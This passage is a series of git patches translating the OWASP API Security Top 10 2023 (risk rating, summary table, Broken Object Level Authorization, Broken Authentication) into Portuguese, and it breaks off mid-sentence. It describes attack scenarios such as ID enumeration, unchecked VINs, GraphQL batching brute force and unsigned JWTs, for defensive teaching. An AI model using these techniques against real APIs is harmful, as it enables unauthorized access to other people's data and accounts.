--- a/editions/2023/pt-pt/0x10-api-security-risks.md +++ b/editions/2023/pt-pt/0x10-api-security-risks.md @@ -1,27 +1,29 @@ -# API Security Risks +# Riscos de Segurança em APIs -The [OWASP Risk Rating Methodology][1] was used to do the risk analysis. +Para a análise de risco usámos a [metodologia de avaliação de risco da +OWASP][1]. -The table below summarizes the terminology associated with the risk score. +A tabela seguinte resume a terminologia associada à pontuação correspondente ao +nível de risco. -| Threat Agents | Exploitability | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impacts | +| Agentes Ameaça | Abuso | Prevalência | Deteção | Impacto Técnico | Impacto Negócio | | :-: | :-: | :-: | :-: | :-: | :-: | -| API Specific | Easy: **3** | Widespread **3** | Easy **3** | Severe **3** | Business Specific | -| API Specific | Average: **2** | Common **2** | Average **2** | Moderate **2** | Business Specific | -| API Specific | Difficult: **1** | Difficult **1** | Difficult **1** | Minor **1** | Business Specific | - -**Note**: This approach does not take the likelihood of the threat agent into -account. Nor does it account for any of the various technical details associated -with your particular application. Any of these factors could significantly -affect the overall likelihood of an attacker finding and exploiting a particular -vulnerability. This rating does not take into account the actual impact on your -business. Your organization will have to decide how much security risk from -applications and APIs the organization is willing to accept given your culture, -industry, and regulatory environment. The purpose of the OWASP API Security Top -10 is not to do this risk analysis for you. Since this edition is not -data-driven, prevalence results from a consensus among the team members. - -## References +| Específico da API | Fácil **3** | Predominante **3** | Fácil **3** | Grave **3** | Específico do Negócio | +| Específico da API | Moderado **2** | Comum **2** | Moderado **2** | Moderado **2** | Específico do Negócio | +| Específico da API | Difícil **1** | Incomum **1** | Difícil **1** | Reduzido **1** | Específico do Negócio | + +**Nota**: Esta abordagem não toma em consideração a probabilidade do Agente de +Ameaça. Também não toma em consideração nenhum detalhe técnico associado à sua +API. Qualquer um destes fatores podem ter impacto significativo na probabilidade +de um atacante encontrar e abusar duma falha de segurança particular. Estes +indicadores não tomam em consideração o impacto atual no seu negócio. Terá de +ser a sua organização a decidir qual o nível de risco para a segurança das suas +aplicações e APIs que está disposta a aceitar, baseado na cultura, indústria e +regulação a que está sujeita. O propósito do OWASP API Security Top 10 não é +fazer essa análise por si. Uma vez que esta edição não é baseada em dados, a +prevalência resulta de um consenso entre os membros da equipa. + +## Referências ### OWASP From dced7be6c90684984d691e8d4b5f95f3a9e2446b Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 22 Apr 2024 13:24:34 +0100 Subject: [PATCH 14/64] Update 0x10-api-security-risks.md --- editions/2023/pt-pt/0x10-api-security-risks.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md index 7efa9b041..41ab360a5 100644 --- a/editions/2023/pt-pt/0x10-api-security-risks.md +++ b/editions/2023/pt-pt/0x10-api-security-risks.md @@ -30,7 +30,7 @@ prevalência resulta de um consenso entre os membros da equipa. * [OWASP Risk Rating Methodology][1] * [Article on Threat/Risk Modeling][2] -### External +### Externas * [ISO 31000: Risk Management Std][3] * [ISO 27001: ISMS][4] From 71f0db5f8e62ce623f4ac3c48ea842752519cff7 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 22 Apr 2024 17:06:37 +0100 Subject: [PATCH 15/64] Update 0x11-t10.md partial --- editions/2023/pt-pt/0x11-t10.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md index 230cc8c72..ac79c8baf 100644 --- a/editions/2023/pt-pt/0x11-t10.md +++ b/editions/2023/pt-pt/0x11-t10.md @@ -2,14 +2,14 @@ | Risk | Description | | ---- | ----------- | -| [API1:2023 - Broken Object Level Authorization][api1] | APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user. | -| [API2:2023 - Broken Authentication][api2] | Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall. | -| [API3:2023 - Broken Object Property Level Authorization][api3] | This category combines [API3:2019 Excessive Data Exposure][1] and [API6:2019 - Mass Assignment][2], focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties. | -| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs. | -| [API5:2023 - Broken Function Level Authorization][api5] | Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions. | -| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | APIs vulnerable to this risk expose a business flow - such as buying a ticket, or posting a comment - without compensating for how the functionality could harm the business if used excessively in an automated manner. This doesn't necessarily come from implementation bugs. | -| [API7:2023 - Server Side Request Forgery][api7] | Server-Side Request Forgery (SSRF) flaws can occur when an API is fetching a remote resource without validating the user-supplied URI. This enables an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall or a VPN. | -| [API8:2023 - Security Misconfiguration][api8] | APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks. | +| [API1:2023 - Broken Object Level Authorization][api1] | As APIs tendem a expor mais _endpoints_ que manipulam identificadores de objetos, tornando as falhas no controlo de acessos mais suscetíveis a ataques. A verificação da autorização para acesso aos objetos deve ser tida em consideração em todas as funções que acedem a dados com base em informação fornecida pelo utilizador.| +| [API2:2023 - Broken Authentication][api2] | Com frequência os mecanismos de autenticação são implementados de forma incorreta, permitindo aos atacantes comprometer os _tokens_ de autenticação ou abusar das falhas na implementação por forma a assumir a identidade de outros utilizadores de forma temporária ou permanente. | +| [API3:2023 - Broken Object Property Level Authorization][api3] | Esta categoria combina [API3:2019 - Excessive Data Exposure][1] e [API6:2019 - Mass Assignment][2], focando na causa principal: a falta de validação de autorização adequada ao nível das propriedades do objeto. Isso leva à exposição ou manipulação de informações por partes não autorizadas. | +| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfazer pedidos de API requer recursos como largura de banda de rede, CPU, memória e armazenamento. Outros recursos como emails/SMS/chamadas telefónicas ou validação biométrica são disponibilizados por fornecedores de serviços através de integrações de API, sendo pagos por pedido. Ataques bem-sucedidos podem levar a uma negação do serviço (DoS) ou a um aumento dos custos operacionais. | +| [API5:2023 - Broken Function Level Authorization][api5] | Políticas de controlo de acesso complexas com diferentes níveis hierárquicos, grupos e perfis e uma não tão clara separação entre o que são ou não funcionalidades administrativas tendem a conduzir a falhas de autorização. Abusando destas falhas os atacantes podem ganhar acesso a recursos de outros utilizadores e/ou a funcionalidades administrativas. | +| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | As APIs vulneráveis a este risco expõem um fluxo de negócio - como comprar um bilhete ou publicar um comentário - sem compensar por como a funcionalidade poderia prejudicar o negócio se fosse usada de forma excessiva e automatizada. Isto não resulta necessariamente de falhas de implementação. | +| [API7:2023 - Server Side Request Forgery][api7] | As falhas de Server-Side Request Forgery (SSRF) podem ocorrer quando uma API está a obter um recurso remoto sem validar o URI fornecido pelo utilizador. Isto permite que um atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por um firewall ou uma VPN. | +| [API8:2023 - Security Misconfiguration][api8] | As APIs e os sistemas que as suportam normalmente contêm configurações complexas, destinadas a tornar as APIs mais personalizáveis. Os engenheiros de software e de DevOps podem ignorar essas configurações ou não seguir as melhores práticas de segurança quando se trata de configuração, abrindo a porta para diferentes tipos de ataques. | | [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. | | [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. | From f6322fd25c5a79f8b33d6edd97b6f3d9b080ee3d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 10:45:55 +0100 Subject: [PATCH 16/64] Update 0x11-t10.md --- editions/2023/pt-pt/0x11-t10.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md index ac79c8baf..84612e31b 100644 --- a/editions/2023/pt-pt/0x11-t10.md +++ b/editions/2023/pt-pt/0x11-t10.md @@ -10,8 +10,8 @@ | [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | As APIs vulneráveis a este risco expõem um fluxo de negócio - como comprar um bilhete ou publicar um comentário - sem compensar por como a funcionalidade poderia prejudicar o negócio se fosse usada de forma excessiva e automatizada. Isto não resulta necessariamente de falhas de implementação. | | [API7:2023 - Server Side Request Forgery][api7] | As falhas de Server-Side Request Forgery (SSRF) podem ocorrer quando uma API está a obter um recurso remoto sem validar o URI fornecido pelo utilizador. Isto permite que um atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por um firewall ou uma VPN. | | [API8:2023 - Security Misconfiguration][api8] | As APIs e os sistemas que as suportam normalmente contêm configurações complexas, destinadas a tornar as APIs mais personalizáveis. Os engenheiros de software e de DevOps podem ignorar essas configurações ou não seguir as melhores práticas de segurança quando se trata de configuração, abrindo a porta para diferentes tipos de ataques. | -| [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. | -| [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. | +| [API9:2023 - Improper Inventory Management][api9] | As APIs tendem a expor mais _endpoints_ do que as aplicações web tradicionais, fazendo com que a documentação se torne ainda mais importante. Um inventário dos _hosts_ e APIs em execução também têm um papel importante na mitigação de falhas tais como versões de APIs descontinuadas e exposição de _endpoints_ para análise de problemas. | +| [API10:2023 - Unsafe Consumption of APIs][api10] | Os programadores tendem a confiar mais nos dados recebidos de APIs de terceiros do que os fornecidos pelo utilizador, e por isso tendem a adotar padrões de segurança mais fracos. Para comprometer APIs, os atacantes visam os serviços de terceiros integrados em vez de tentarem comprometer a API alvo diretamente. | [1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/ [2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/ From c59fa30c0fc27d1a0d8ebe46244d14216150a9ce Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 15:05:59 +0100 Subject: [PATCH 17/64] Update 0xa1-broken-object-level-authorization.md --- .../2023/pt-pt/0xa1-broken-object-level-authorization.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index be629d9c8..42ffc88fa 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -1,9 +1,9 @@ # API1:2023 Broken Object Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Moderate** : Business Specific | -| Attackers can exploit API endpoints that are vulnerable to broken object-level authorization by manipulating the ID of an object that is sent within the request. Object IDs can be anything from sequential integers, UUIDs, or generic strings. Regardless of the data type, they are easy to identify in the request target (path or query string parameters), request headers, or even as part of the request payload. | This issue is extremely common in API-based applications because the server component usually does not fully track the client’s state, and instead, relies more on parameters like object IDs, that are sent from the client to decide which objects to access. The server response is usually enough to understand whether the request was successful. | Unauthorized access to other users’ objects can result in data disclosure to unauthorized parties, data loss, or data manipulation. Under certain circumstances, unauthorized access to objects can also lead to full account takeover. | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Moderado** : Específico do Negócio | +| Os atacantes podem explorar endpoints de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. | Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | ## Is the API Vulnerable? From eb9e10cd89d55eef21f39d6f238a593d82f27009 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 15:36:45 +0100 Subject: [PATCH 18/64] Update 0xa1-broken-object-level-authorization.md --- .../0xa1-broken-object-level-authorization.md | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 42ffc88fa..14f5f6e91 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -3,36 +3,36 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Moderado** : Específico do Negócio | -| Os atacantes podem explorar endpoints de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. | Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | +| Os atacantes podem explorar *endpoints* de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. | Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | -## Is the API Vulnerable? +## A API é vulnerável? -Object level authorization is an access control mechanism that is usually -implemented at the code level to validate that a user can only access the -objects that they should have permissions to access. +A autorização de acesso ao nível do objeto é um mecanismo de controlo que +geralmente é implementado ao nível do código para validar que um utilizador +só pode aceder aos objetos aos quais deveria ter permissão para aceder. -Every API endpoint that receives an ID of an object, and performs any action -on the object, should implement object-level authorization checks. The checks -should validate that the logged-in user has permissions to perform the -requested action on the requested object. +Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação +sobre o objeto deve implementar verificações de autorização ao nível do +objeto. As verificações devem validar que o utilizador autenticado tem +permissões para realizar a ação solicitada sobre o objeto alvo. -Failures in this mechanism typically lead to unauthorized information -disclosure, modification, or destruction of all data. +As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de +informações, modificação ou destruição de todos os dados. -Comparing the user ID of the current session (e.g. by extracting it from the -JWT token) with the vulnerable ID parameter isn't a sufficient solution to -solve Broken Object Level Authorization (BOLA). This approach could address -only a small subset of cases. +Comparar o ID do utilizador da sessão atual (por exemplo, ao extraí-lo do +token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente +para resolver a falha de Broken Object Level Authorization (BOLA). Esta +abordagem pode endereçar apenas um pequeno subconjunto de casos. -In the case of BOLA, it's by design that the user will have access to the -vulnerable API endpoint/function. The violation happens at the object level, -by manipulating the ID. If an attacker manages to access an API -endpoint/function they should not have access to - this is a case of [Broken -Function Level Authorization][5] (BFLA) rather than BOLA. +No caso de BOLA, é por design que o utilizador tem acesso ao +*endpoint*/função da API vulnerável. A violação ocorre ao nível do objeto, +através da manipulação do ID. Se um atacante conseguir aceder a um +*endpoint*/função da API ao qual não deveria ter acesso - este é um caso de +[Broken Function Level Authorization][5] (BFLA) em vez de BOLA. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 An e-commerce platform for online stores (shops) provides a listing page with the revenue charts for their hosted shops. Inspecting the browser requests, an @@ -43,7 +43,7 @@ simple script to manipulate the names in the list, replacing `{shopName}` in the URL, the attacker gains access to the sales data of thousands of e-commerce stores. -### Scenario #2 +### Cenário #2 An automobile manufacturer has enabled remote control of its vehicles via a mobile API for communication with the driver's mobile phone. The API enables @@ -54,7 +54,7 @@ The API fails to validate that the VIN represents a vehicle that belongs to the logged in user, which leads to a BOLA vulnerability. An attacker can access vehicles that don't belong to him. -### Scenario #3 +### Cenário #3 An online document storage service allows users to view, edit, store and delete their documents. When a user's document is deleted, a GraphQL mutation with the @@ -78,7 +78,7 @@ POST /graphql Since the document with the given ID is deleted without any further permission checks, a user may be able to delete another user's document. -## How To Prevent +## Como Prevenir * Implement a proper authorization mechanism that relies on the user policies and hierarchy. @@ -89,14 +89,14 @@ checks, a user may be able to delete another user's document. * Write tests to evaluate the vulnerability of the authorization mechanism. Do not deploy changes that make the tests fail. -## References +## Referências ### OWASP * [Authorization Cheat Sheet][1] * [Authorization Testing Automation Cheat Sheet][2] -### External +### Externas * [CWE-285: Improper Authorization][3] * [CWE-639: Authorization Bypass Through User-Controlled Key][4] From e4178b06fb3f87a6d04fc616b79481195153266d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 16:50:13 +0100 Subject: [PATCH 19/64] Update 0xa1-broken-object-level-authorization.md --- .../0xa1-broken-object-level-authorization.md | 64 ++++++++++--------- 1 file changed, 35 insertions(+), 29 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 14f5f6e91..15541ad14 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -34,31 +34,33 @@ através da manipulação do ID. Se um atacante conseguir aceder a um ### Cenário #1 -An e-commerce platform for online stores (shops) provides a listing page with -the revenue charts for their hosted shops. Inspecting the browser requests, an -attacker can identify the API endpoints used as a data source for those charts -and their pattern: `/shops/{shopName}/revenue_data.json`. Using another API -endpoint, the attacker can get the list of all hosted shop names. With a -simple script to manipulate the names in the list, replacing `{shopName}` in -the URL, the attacker gains access to the sales data of thousands of e-commerce -stores. +Uma plataforma de comércio eletrónico para criar lojas online oferece uma página +de listagem com gráficos relativos à receita das lojas. Inspecionando os pedidos +realizados pelo navegador um atacante identifica os _endpoints_ da API usados +para obter os dados a partir dos quais são gerados os gráficos bem como o seu +padrão `/shops/{shopName}/revenue_data.json`. Utilizado outro _endpoint_ da API +o atacante obtém a lista com o nome de todas as lojas. Com recurso a um _script_ +simples para substituir `{shopName}` no URL pelos nomes que constam da lista, o +atacante consegue acesso aos dados relativos às vendas de milhares de lojas +online. ### Cenário #2 -An automobile manufacturer has enabled remote control of its vehicles via a -mobile API for communication with the driver's mobile phone. The API enables -the driver to remotely start and stop the engine and lock and unlock the doors. -As part of this flow, the user sends the Vehicle Identification Number (VIN) to -the API. -The API fails to validate that the VIN represents a vehicle that belongs to the -logged in user, which leads to a BOLA vulnerability. An attacker can access -vehicles that don't belong to him. +Um fabricante de automóveis habilitou o controlo remoto dos seus veículos +através de uma API para comunicação com o telemóvel do condutor. A API +permite ao condutor iniciar e parar o motor e trancar e destrancar as portas +remotamente. Como parte deste processo, o utilizador envia o Número de +Identificação do Veículo (VIN) para a API. +No entanto, a API não valida se o VIN representa um veículo que pertence ao +utilizador autenticado, o que resulta numa vulnerabilidade de BOLA. Um atacante +pode aceder a veículos que não lhe pertencem. ### Cenário #3 -An online document storage service allows users to view, edit, store and delete -their documents. When a user's document is deleted, a GraphQL mutation with the -document ID is sent to the API. +Um serviço de armazenamento de documentos online permite aos utilizadores +visualizar, editar, armazenar e eliminar os seus documentos. Quando um +documento de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID +do documento para a API. ``` POST /graphql @@ -75,19 +77,23 @@ POST /graphql } ``` -Since the document with the given ID is deleted without any further permission -checks, a user may be able to delete another user's document. +Uma vez que o documento com o ID fornecido é eliminado sem quaisquer +verificações adicionais de permissão, um utilizador pode conseguir eliminar o +documento de outro utilizador. ## Como Prevenir -* Implement a proper authorization mechanism that relies on the user policies - and hierarchy. -* Use the authorization mechanism to check if the logged-in user has access to - perform the requested action on the record in every function that uses an - input from the client to access a record in the database. -* Prefer the use of random and unpredictable values as GUIDs for records' IDs. -* Write tests to evaluate the vulnerability of the authorization mechanism. Do - not deploy changes that make the tests fail. +* Implementar um mecanismo de autorização baseado nas políticas de utilizador e + hierarquia. +* Utilizar um mecanismo de autorização para verificar se o utilizador com sessão + ativa tem permissão para realizar a ação pretendida sobre o registo. Esta + verificação deve ser feita por todas as funções que utilizem informação + fornecida pelo cliente para aceder a um registo na base de dados. +* Utilizar preferencialmente valores aleatórios e não previsíveis (e.g., GUID) + como identificador para os registos. +* Escrever testes para avaliar o correto funcionamento do mecanismo de + autorização. Não colocar em produção alterações vulneráveis que não passem nos + testes. ## Referências From 962c79f040f0b05200af79ea6a78e16a6a5986af Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 17:23:27 +0100 Subject: [PATCH 20/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index a02822f90..a19710a14 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -1,11 +1,11 @@ # API2:2023 Broken Authentication -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | -| The authentication mechanism is an easy target for attackers since it's exposed to everyone. Although more advanced technical skills may be required to exploit some authentication issues, exploitation tools are generally available. | Software and security engineers’ misconceptions regarding authentication boundaries and inherent implementation complexity make authentication issues prevalent. Methodologies of detecting broken authentication are available and easy to create. | Attackers can gain complete control of other users’ accounts in the system, read their personal data, and perform sensitive actions on their behalf. Systems are unlikely to be able to distinguish attackers’ actions from legitimate user ones. | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | +| O mecanismo de autenticação é um alvo fácil para os atacantes, uma vez que está exposto a todos. Embora possam ser necessárias competências técnicas mais avançadas para explorar alguns problemas de autenticação, geralmente existem ferramentas de exploração disponíveis. | As conceções erradas dos engenheiros de software e de segurança sobre os limites da autenticação e a complexidade inerente da implementação tornam os problemas de autenticação prevalentes. Metodologias para detetar *broken authentication* estão disponíveis e são fáceis de criar. | Os atacantes podem obter controlo total das contas de outros utilizadores no sistema, ler os seus dados pessoais e realizar ações sensíveis em seu nome. Os sistemas têm pouca probabilidade de conseguir distinguir as ações dos atacantes das ações legítimas dos utilizadores. | -## Is the API Vulnerable? +## A API é vulnerável? Authentication endpoints and flows are assets that need to be protected. Additionally, "Forgot password / reset password" should be treated the same way @@ -35,7 +35,7 @@ On top of that, a microservice is vulnerable if: ## Example Attack Scenarios -## Scenario #1 +## Cenário #1 In order to perform user authentication the client has to issue an API request like the one below with the user credentials: @@ -70,7 +70,7 @@ POST /graphql ] ``` -## Scenario #2 +## Cenário #2 In order to update the email address associated with a user's account, clients should issue an API request like the one below: @@ -88,7 +88,7 @@ steal the auth token might be able to take over the victim's account by starting the reset password workflow after updating the email address of the victim's account. -## How To Prevent +## Como Prevenir * Make sure you know all the possible flows to authenticate to the API (mobile/ web/deep links that implement one-click authentication/etc.). Ask @@ -112,7 +112,7 @@ account. * API keys should not be used for user authentication. They should only be used for [API clients][3] authentication. -## References +## Referências ### OWASP @@ -120,7 +120,7 @@ account. * [Key Management Cheat Sheet][4] * [Credential Stuffing][5] -### External +### Externas * [CWE-204: Observable Response Discrepancy][6] * [CWE-307: Improper Restriction of Excessive Authentication Attempts][7] From 29a93235a9de4b5a781f8a8d9d7d336d0fd9ed85 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 17:50:38 +0100 Subject: [PATCH 21/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 72 ++++++++++--------- 1 file changed, 37 insertions(+), 35 deletions(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index a19710a14..d9d480d46 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -7,38 +7,39 @@ ## A API é vulnerável? -Authentication endpoints and flows are assets that need to be protected. -Additionally, "Forgot password / reset password" should be treated the same way -as authentication mechanisms. - -An API is vulnerable if it: - -* Permits credential stuffing where the attacker uses brute force with a list - of valid usernames and passwords. -* Permits attackers to perform a brute force attack on the same user account, - without presenting captcha/account lockout mechanism. -* Permits weak passwords. -* Sends sensitive authentication details, such as auth tokens and passwords in - the URL. -* Allows users to change their email address, current password, or do any other - sensitive operations without asking for password confirmation. -* Doesn't validate the authenticity of tokens. -* Accepts unsigned/weakly signed JWT tokens (`{"alg":"none"}`) -* Doesn't validate the JWT expiration date. -* Uses plain text, non-encrypted, or weakly hashed passwords. -* Uses weak encryption keys. - -On top of that, a microservice is vulnerable if: - -* Other microservices can access it without authentication -* Uses weak or predictable tokens to enforce authentication - -## Example Attack Scenarios +Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. +Além disso, mecanismos de recuperação de _password_ devem ser tratados da mesma +forma que os mecanismos de autenticação. + +Uma API é vulnerável se: + +* Permite ataques de _credential stuffing_, onde o atacante utiliza força bruta + com uma lista de nomes de utilizador e palavras-passe válidos. +* Permite ataques de força bruta a uma conta de utilizador específica, não + implementando mecanismos de mitigação como _captcha_ ou bloqueio da conta por + excesso de tentativas de autenticação falhadas. +* Permite a utilização de _passwords_ fracas. +* Envia informação de autenticação, tal como _tokens_ e _passwords_, no URL. +* Permite que os utilizadores alterem o seu endereço de email, _password_ atual ou + realizem outras operações sensíveis sem pedir a confirmação da _password_. +* Não valida a autenticidade dos _tokens_ de autenticação. +* Aceita _tokens_ JWT sem que estes sejam assinados/usando algoritmos fracos + `("alg":"none")` +* Não valida a data de expiração dos _tokens_ JWT. +* Utiliza _passwords_ em texto, não encriptadas, ou resumos fracos. +* Utiliza chaves de encriptação fracas. + +Além disso, um microsserviço é vulnerável se: + +* Outros microsserviços podem aceder a ele sem autenticação +* Utiliza tokens fracos ou previsíveis para impor autenticação + +## Exemplos de Cenários de Ataque ## Cenário #1 -In order to perform user authentication the client has to issue an API request -like the one below with the user credentials: +Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido +de API como o exemplo abaixo, com as credenciais do utilizador: ``` POST /graphql @@ -51,13 +52,14 @@ POST /graphql } ``` -If credentials are valid, then an auth token is returned which should be -provided in subsequent requests to identify the user. Login attempts are -subject to restrictive rate limiting: only three requests are allowed per -minute. +Se as credenciais forem válidas, é devolvido um token de autenticação que +deve ser fornecido em pedidos subsequentes para identificar o utilizador. +A quantidade de tentativas de login está sujeita a uma limitação temporal +restritiva: apenas três pedidos são permitidos por minuto. -To brute force log in with a victim's account, bad actors leverage GraphQL -query batching to bypass the 